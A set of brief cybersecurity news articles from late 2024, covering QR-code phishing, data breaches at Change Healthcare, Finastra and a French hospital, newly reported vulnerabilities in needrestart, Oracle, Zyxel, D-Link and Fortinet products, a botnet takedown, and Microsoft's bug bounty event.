• New research claims most QR code emails are spam
• QR codes can easily bypass anti-spam filters, Cisco Talos warns
• 'Quishing' attacks are becoming more common

The dangers of clicking an unknown or suspicious link should have been drilled into most of us by now, but many don’t realize scanning a malicious QR code from an unknown source could be just as damaging.

Despite QR codes steadily gaining popularity over the last few years, research from Cisco Talos has claimed many people still don’t consider the threats they could pose.

A driving factor to this is the fact that anti-spam filters aren’t designed to recognize that a QR code is present in an image, so they overwhelmingly evade detection - with the team saying that although only 1 in every 500 emails contains a QR code, a staggering 60% of those are spam.

'Quishing' threats

QR code phishing, or ‘Quishing’ is becoming an increasingly common threat, and often imitate real sites to trick victims into entering personal and payment information. Fraudsters were observed placing QR stickers on parking meters, for example, to trick victims into entering their payment details into fake parking apps.

Talos particularly warned on malicious QR code emails, which sent fake multi-factor authentication requests, used to steal user credentials.

QR codes in emails only make up a fraction of emails worldwide (between 0.1 %and 0.2%), but Talos found these messages disproportionately bypass anti-spam filters, so users see them in their inboxes much more often than you'd expect.

Malicious URLs can be ‘defanged’ by changing the protocol from ‘http’ to ‘hxxp’, or adding brackets around one of the dots in the URL - this means browsers don't render the link as an active URL, and ensures users don’t inadvertently follow the link. This is less common with QR codes.

It can be done though, either by obscuring the data modules or by removing one or more of the position detection patterns (one of the large squares in the corner of the QR code). This makes the QR codes safe for consumption.

Users should exercise just as much caution with QR codes as they do suspicious links, Talos suggests. For those who may need to use QR's regularly, there are QC decoders available online which will take screenshots of the code and allow you to closely inspect the link.

You might also like

• Take a look at our pick of the best antivirus software around
• ‘Scam Yourself’ attacks have fooled millions — here's how not to fall victim
• Check out our choices for best malware removal software

• Change Healthcare's clearinghouse services have been restored
• The organization suffered a huge ransomware attack in February
• Attack has cost it over $2 billion so far

Change Healthcare has confirmed its clearinghouse services have finally been restored after the organization suffered a massive ransomware attack in February 2024.

Recovery from the Change Healthcare cyberattack has been grueling, costing close to $2 billion so far, with some systems still yet to be restored nearly nine months on.

Although most of its network was restored after two months, some functions are still not fully restored, including its pharmacy claims management and e-health record information exchange systems.

100 million affected

Change Healthcare and parent company UnitedHealth Group's activities touch 1 in 3 patient records in the US, processing 15 billion health care transactions annually.

The attack caused unprecedented levels of disruption to billing and payments providers across the US, and threatened the viability of hospitals across the country.

It was recently revealed that as many as 100 million people’s information was exposed in the attack, with 6TB of sensitive data stolen, including health insurance info, billings, claims, payment information, and much more.

UnitedHealth reportedly paid $22 million to the notorious ALPHV group in exchange for the data, but the remediation of the attack alone cost $873 million, so the costs keep rising.

Reports claim the ransom never made it to the affiliates responsible for the attack, and was taken in entirety by the ransomware operators, who were only meant to receive a portion.

The attackers reportedly used stolen credentials to log into a Citrix portal that didn't have multi-factor authentication turned on, which left the organization vulnerable.

It’s likely the repercussions of the attack will be felt long into the future, with some systems yet to be restored. Healthcare providers reported that by early March 2024, 60% of hospitals in the association were seeing a revenue shortfall of $1 million or more per day, and a third of providers had over half their revenue impacted.

Via The Register

You might also like

• Take a look at our pick of the best malware removal software
• Hospital cyberattack exposes data on nearly a million patients
• Check out our choices for best antivirus software

• Security researchers find multiple flaws in service introduced a decade ago
• The flaws allow malicious actors to escalate privileges and run arbitrary code
• A patch is available, and users are urged to apply it

Ubuntu Linux has been carrying multiple high-severity vulnerabilities for a decade, allowing malicious actors the ability to escalate their privileges to root without user interaction, experts have warned.

Cybersecurity researchers Qualys found the bugs in the OS utility feature called ‘needrestart’, a utility that checks which services need to be restarted after an update or a change in the system's libraries or binaries.

It is particularly useful after applying security updates or upgrading packages, as it ensures that the updates are effectively applied without requiring a full system reboot.

Exploitable vulnerabilities

Needrestart is capable of identifying services using outdated libraries, prompting to restart them, and recommending a system reboot when necessary. As a result, it helps maintain the security and stability of a system without needing frequent reboots.

It was introduced in 2014 and maintained as a Debian package. It was vulnerable since the day of its inception, with Ubuntu Linux version 21.04. The five vulnerabilities in question are tracked as CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003. Needrestart’s earliest vulnerable version is 0.8, and earliest clean version is 3.8, released earlier this week.

More details about the vulnerabilities can be found here, but in short - they allow crooks to execute arbitrary code on vulnerable systems. The only prerequisite is that they have local access, either through malware, or compromised accounts.

While this sounds like a solid mitigation, BleepingComputer reminds that attackers exploited similar Linux elevation of privilege flaws in the past, as well.

One notable example is Loony Tunables, which exploited the nf_tables bug. Needrestart is an extremely popular, and widely used feature, and hackers will most likely now try to exploit it. Therefore, it is essential users upgrade to version 3.8 or later, as soon as possible.

Via BleepingComputer

You might also like

• This commonly-used Ubuntu tool can be hijacked to spread malware
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• A threat actor is offering a large database for sale, claims it came from Finastra
• The finance giant sends out data breach notification letter to affected customers, claiming its secure file transfer service was compromised
• The attacker used stolen credentials to pull off the heist

Fintech software firm Finastra is warning its customers a recent data breach may have meant it recently lost some data.

Security researcher Brian Krebs obtained a copy of the letter sent to affected individuals, which says the breach was not the result of an exploited vulnerability, but rather the result of stolen credentials.

“The threat actor did not deploy malware or tamper with any customer files within the environment,” the notice reads. “Furthermore, no files other than the exfiltrated files were viewed or accessed.”

400GB - zipped

The company told BleepingComputer the attack originated on its Secure File Transfer Platform (SFTP): "On November 7, 2024 Finastra's Security Operations Center (SOC) detected suspicious activity related to an internally hosted Secure File Transfer Platform (SFTP) we use to send files to certain customers," Finastra told the publication.

"We immediately launched an investigation alongside of a third-party cybersecurity firm and, as a precautionary step, isolated and contained the platform. This incident was limited to the one platform and there was no lateral movement beyond it."

The same source also claims the platform was not the company’s default one, and was not used by all customers, suggesting that not everyone’s data was compromised.

At the same time, a threat actor with the alias ‘abyss0’ offered for sale a large archive, claiming to originate from Finastra.

“Today we list for sale Finastra.com data breach, dated 2024 Nov,” the notice reads. “In total, 400GB~ zipped.”

“This data is from their ESB and exfil via IBM Aspera, not everything just stuff we deemed as important. There is a lot of files and different file format.”

Finastra is a financial software company with more than 8,000 institutions for customers - among its clients are most of the world’s top banks and credit unions, and it counts tens of thousands of employees.

Via BleepingComputer

You might also like

• Fidelity data breach exposes details of thousands of customers
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• A hacker advertised access to a number of French healthcare organizations
• A few hours later, they tried selling sensitive data grabbed from some of them
• More than 750,000 people were apparently exposed

A cyberattack against a French hospital has resulted in the theft of sensitive data on almost a million patients.

A threat actor with the alias near2tlg took to the infamous hacking community BreachForums to offer access to “multiple establishments”, including Centre Luxembourg, Clinique Alleray-Labrouste, and a couple of others.

They claimed that the offering granted access to sensitive data belonging to 1.5 million people, including patient records, billing, and other data.

Compromised account

Two hours later, the same actor posted a new thread, selling “French hospital data”. The compromised information allegedly included people’s names, dates of birth, gender, postal addresses, cities, postal codes, phone numbers, and email addresses. Furthermore, the archive contained information on attending physicians, prescriptions, death declarations, and more. They said that 758,912 users were affected, and that the breach was done through Mediboard.

Mediboard is an Electronic Patient Record (EPR) solution, developed by Softway Medical Group. The company confirmed the breach to local media, but stressed that the attack did not come as a result of a vulnerability, but rather as a result of stolen credentials.

"We want to emphasize that the affected health data were not hosted by Softway Medical Group," they said.

In a statement to BleepingComputer, the company said that the compromised account had elevated privileges: "We can confirm that our software is not responsible, but rather, a privileged account within the client's infrastructure was compromised by an individual who exploited the standard functions of the solution.”

"This hypothesis has been substantiated. It is therefore neither due to improper implementation of the software nor human error."

At press time, there were no confirmed buyers, but healthcare information is usually highly regarded among cybercriminals. They can use it for a wide variety of crime, from phishing, to identity theft, wire fraud, and more.

You might also like

• US government sanctions massive proxy botnet operation that offered free VPN services
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Microsoft announces Zero Day Quest, a new hacking event for security researchers
• An in-person event will also take place
• Bug bounties for AI-related issues has also been doubled

Microsoft has announced an open to all research challenge to encourage researchers to discover high-impact vulnerabilities in its programs.

Zero Day Quest will offer bug bounties for researchers who report flaws in Microsoft AI, Azure, Identity, Dynamics 365 and Power platform, and M365.

The challenge will run until January 19, 2025, and will be subject to existing bounty program terms, the safe harbor policy, and additional terms and conditions.

AI bugs worth double

Microsoft hopes the event will bring together the security community and encourage collaboration between researchers and engineers to help keep all its users safe.

Alongside an online event, the best 45 researchers (by bounty awarded amount) will be invited to an all-expenses paid Onsite Zero Day Quest event in Washington, with the 10 highest ranked researchers from the 2024 Azure, Dynamics, and Office leaderboards also invited.

AI has been dominating the security conversation for the last year, and to reflect the growing concerns for AI security, Microsoft has doubled the AI bounty awards. Other bounty multipliers have also been included, such as the discovery of critical and important severity Remote Code Execution and Elevation of Privilege flaws.

Microsoft has made security its number one priority, embarking on its secure future initiative to ensure ‘security above all else’ in order to protect users and businesses.

“This new hacking event will be the largest of its kind, with an additional $4 million in potential awards for research into high-impact areas, specifically cloud and AI,” said Tom Gallagher, VP of Engineering for Microsoft Security Response Center.

“Zero Day Quest will provide new opportunities for the security community to work hand in hand with Microsoft engineers and security researchers – bringing together the best minds in security to share, learn, and build community as we work to keep everyone safe.”

You might also like

• Take a look at our pick of the best malware removal software
• Google slams Microsoft security failures, offers software discounts in bid to poach customers
• Check out our choices for best antivirus software

• Security researchers from Lumen's Black Lotus were investigating the ngioweb botnet for more than a year
• After identifying the infrastructure and traffic, the company started blocking the data flow
• The botnet, and the proxy service NSOCKS, are severely disrupted as a result

Security researchers have disrupted a major malicious botnet, and thus also hurt the proxy service it powered.

Cybersecurity researchers from Lumen’s Black Lotus have released a new report saying they blocked all traffic across their global network that went to, or from, the dedicated infrastructure associated with the ‘ngioweb’ botnet.

The Ngioweb botnet, first spotted in mid-2023, operated more than 35,000 bots (compromised endpoints, basically) every day. The bots were located in 180 countries and were used, first and foremost, to power the NSOCKS proxy service. This “notorious criminal proxy service”, as Black Lotus describes it, is linked to the threat actor known as Muddled Libra. There are also indications that the proxy was used by state-sponsored threat actors such as APT28 (aka FancyBear, a known Russian threat actor).

Disrupting the operation

“At least 80% of NSOCKS bots in our telemetry originate from the ngioweb botnet, mainly utilizing small office/home office (SOHO) routers and IoT devices. Two-thirds of these proxies are based in the U.S.,” the researchers said.

A proxy service allows threat actors to run different malicious campaigns, while hiding their true identity and location, by using a “proxy” - or a middleman device.

Besides operating as a proxy, the ngioweb botnet could also be used to mount disruptive Distributed Denial of Service (DDoS) attacks.

Lumen took more than a year to analyze the botnet and its operations, and while it could not conclude exactly how the hardware was compromised, it speculated that it was most likely through various n-day vulnerabilities.

At press time, the NSOCKS proxy, and the underlying ngioweb botnet are being heavily disrupted by Lumen and its partners, given that the researchers found both the botnet’s architecture, and traffic.

Via BleepingComputer

You might also like

• US government sanctions massive proxy botnet operation that offered free VPN services
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Researchers spot Helldown exploiting Zyxel VPN to breach networks
• The flaw was previously undisclosed
• The crooks mostly target SMBs in the US and Europe

There appears to be a new ransomware player in town, exploiting vulnerabilities in Zyxel firewalls and IPSec access points to compromise victims, steal their data, and encrypt their systems.

The group is called Helldown, and has been active since summer 2023, a new report from cybersecurity researchers has revealed Sekoia, noting the group most likely uses a previously undisclosed vulnerability in Zyxel’s firewalls for initial access.

Furthermore, the group seems to be exploiting CVE-2024-42057, a command injection bug in IPSec VPN that, in certain scenarios, grants unauthenticated users the ability to run OS commands.

Dozens of victims

When they breach a target network, they steal as many files as they can, and encrypt the system. For encryption, they seem to be using a piece of software developed from the leaked LockBit 3 builder. The researchers said the encryptor was relatively basic, but also probably still under development.

As basic as it is, the encryptor still locked down at least 31 organizations, as that’s the number of victims listed on the group’s data leak site. According to BleepingComputer, between November 7 and today, the number dropped to 28, which could be a hint that some organizations paid the ransom demand. We don’t know who the victims are, or how much money the crooks demanded in return for the decryption key and for keeping the data secure.

Most of the victims seem to be small and medium-sized organizations in the United States and Europe.

If the researchers are indeed right, and Helldown does use flaws in Zyxel and IPSec instances to breach the networks, the best way to defend would be to keep these devices up to date, and limit access to trusted accounts only. CVE-2024-42057 that plagues IPSec was fixed on September 3, and the earliest clean firmware version is 5.39. For Zyxel, since the vulnerability is still undisclosed, it would be wise to keep an eye on upcoming advisories and deploy the patch as soon as it’s published.

Via BleepingComputer

You might also like

• Thousands of Oracle NetSuite ERP websites found leaking private customer information
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Oracle reports patching a security flaw in Agile PLM
• The bug was being exploited in the wild to steal files
• More than 1,000 companies could be vulnerable

Oracle has fixed a vulnerability in its Oracle Agile Product Lifecycle Management (PLM) product which could have allowed threat actors to download files from the platform.

Since the bug was exploited in the wild as a zero-day, the company urged users to apply the patch immediately and thus secure their endpoints.

Oracle Agile Product Lifecycle Management (PLM) is the company's software tool to help businesses manage the entire lifecycle of a product, from ideation and design to production and retirement.

Confirmed exploitation

More than 1,100 companies reportedly use Oracle Agile Product Lifecycle Management (PLM), predominantly large enterprises with more than 10,000 employees and revenues exceeding $1 billion. The total number of individual users across these organizations is not publicly disclosed and can vary significantly based on each company's size and specific deployment of the software.

The patch fixes a bug tracked as CVE-2024-21287, with a designated severity score of 7.5 (high). It is remotely exploitable without authentication, Oracle explained in an advisory, adding, “it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in file disclosure."

"Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible."

In the advisory, the company did not state the bug was being exploited in the wild, but a later blog post by the company’s VP of Security Assurance, Eric Maurice, confirmed it, BleepingComputer found.

"This vulnerability affects Oracle Agile Product Lifecycle Management (PLM). It was reported as being actively exploited "in the wild" by CrowdStrike," Maurice said.

At press time, other details were not available, so we don’t know who the threat actors are, or who they are targeting in their campaign. In any case, it’s better to be safe than sorry, so make sure to apply the patch ASAP.

You might also like

• Thousands of Oracle NetSuite ERP websites found leaking private customer information
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Gen Q3 Threat Report reveals 'Scam Yourself' attacks saw a huge rise
• 614% increase in social engineering scam
• Ransomware and crypto scams are also claiming more victims

The last few months have seen a worrying escalation in ransomware, malvertising, infostealers, and crypto scams, new research has claimed.

The Gen Q3 Threat Report has revealed a major rise in ‘Scam Yourself Attacks’, a type of social engineering tactic tricking users into compromising their own systems, which saw a staggering 614% rise quarter over quarter.

The ‘scam yourself’ term covers a number of threats, including FakeCaptcha, fake tutorials, and ClickFix scams. The familiarity of Captcha uses ClickFix to trick unsuspecting victims into running malicious scripts and downloading malware.

How to: download malware

YouTube tutorials are being used by cybercriminals to encourage users to download malware under the guise of installing software. Security vendors and antivirus software should detect this, even if the user is the one who clicks, copies, and executes the threat.

However, as part of the tutorial, many users are prompted to turn off their antivirus controls - which is what makes this attack so alarming.

Alongside these threats , the report outlines a 24% increase in ransomware attacks from the previous quarter, which echoes reports from earlier this year which revealed such incidents are soaring to new highs around the world.

The rise of Lumma stealer, a Malware-as-a-Service, has fueled a 39% rise quarter of quarter in infostealer activity. These attacks are gaining prominence thanks to their ability to bypass protections, the report states.

Crypto scams also saw a spike in activity thanks to evolving deepfake technology which exploits media events, which is something we have seen on the rise in recent months. The growingly convincing fake videos can attract huge audiences and leverage the likenesses of well known figures and celebrities and encourage viewers to invest in fake crypto schemes.

You might also like

• Take a look at our pick of the best antivirus software around
• These are the most damaging scams around, according to Google — so be on your guard
• Check out our choices for best malware removal software

• Security researchers find a critical remote code execution flaw in multiple D-Link router models
• The models reached end of life status last spring, meaning the flaw won't be patched
• D-Link urges users to replace the devices with newer models immediately

A critical vulnerability, allowing for remote code execution (RCE) attacks, has been discovered on multiple D-Link VPN routers.

However, since the models have now reached end-of-life, D-Link will not be issuing a patch - and instead, it urged users to retire the affected devices and replace them with newer, supported models.

The flaw does not have a CVE designation just yet, but the company, as well as the researcher who found the flaw - alias ‘desploit’ - will not be releasing any details about it, to give affected customers enough time to react. In any case, once word gets out, cybercriminals will definitely start scanning for vulnerable routers, so if you’re using one of these models, make sure to replace them as soon as possible:

DSR-150
DSR-150N
DSR-250
DSR-250N

No workarounds

D-Link said that both hardware and firmware for these devices have expired, and workarounds are not recommended:

"The DSR-150 / DSR-150N / DSR-250 / DSR-250N all hardware versions and firmware versions have been EOL/EOS as of 05/01/2024. This exploit affects this legacy D-Link router and all hardware revisions, which have reached their End of Life [...]. Products that have reached their EOL/EOS no longer receive device software updates and security patches and are no longer supported by D-Link US,” D-Link said in a recent security advisory.

"D-Link strongly recommends that this product be retired.”

Routers, being the gateways of all internet traffic on a local network, are usually the first thing criminals will try to compromise in their attacks. End-of-life devices with known critical vulnerabilities, especially RCE, are considered low hanging fruit.

Furthermore, the affected device versions are often used in homes and small businesses, according to a recent BleepingComputer report. That makes them an ideal target for malware deployment, distributed denial of service botnets, and possibly even ransomware attacks.

Via BleepingComputer

You might also like

• D-Link says it won't patch 60,000 older modems, as they're not worth saving
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Researchers spot Chinese threat actor stealing login credentials from Fortinet VPN
• Thefts carried out with the help of a vulnerability discovered in 2023
• The bug is yet to be addressed, or even assigned a CVE

Cybersecurity researchers has revealed that for months now, Fortinet’s Windows VPN client has been vulnerable to a flaw which allows threat actors to steal user credentials - and Chinese hackers have reportedly now started exploiting the bug and stealing the data.

Experts from Volexity have published an in-depth report on a piece of malware called DeepData. This malware was used by a Chinese threat actor known as BrazenBamboo to steal login credentials, and VPN server information from Fortinet VPNs.

As the experts explain, after a user logs into the VPN, user credentials remain in process memory. DeepData can find and decrypt JSON objects in the client’s process memory, effectively stealing the information. As a final step, DeepData can exfiltrate the information to a server under the attackers’ control.

BrazenBamboo

Volexity found the vulnerability in early July 2024, and reported it to Fortinet. The company acknowledged the issue on July 24, however, it never acted on the findings, and the vulnerability is still unresolved. It was not even assigned a CVE number, and there is no indication when a fix might be available, if ever.

The findings are disturbing since Fortinet’s VPNs are used by many organizations of all sizes, all across the world. By obtaining login credentials, cybercriminals can gain access to company networks, which allows them to move laterally, steal more information, and potentially even deploy ransomware.

Until a patch is made available, Volexity advises users to restrict VPN access, and keep both eyes peeled for unusual login activity.

BrazenBamboo seems to be a state-sponsored threat actor, meaning it’s on China’s payroll. The researchers believe the group was the one to develop three known malware families, Lightspy, DeepData, and DeepPost. Unlike North Korean groups, who don’t shy away from deploying ransomware or other destructive malware, Chinese groups are mostly interested in cyber-espionage, and as such are usually trying their best to remain hidden for as long as possible.

Via BleepingComputer

You might also like

• Chinese threat actors may have already breached UK critical infrastructure, ministers told
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now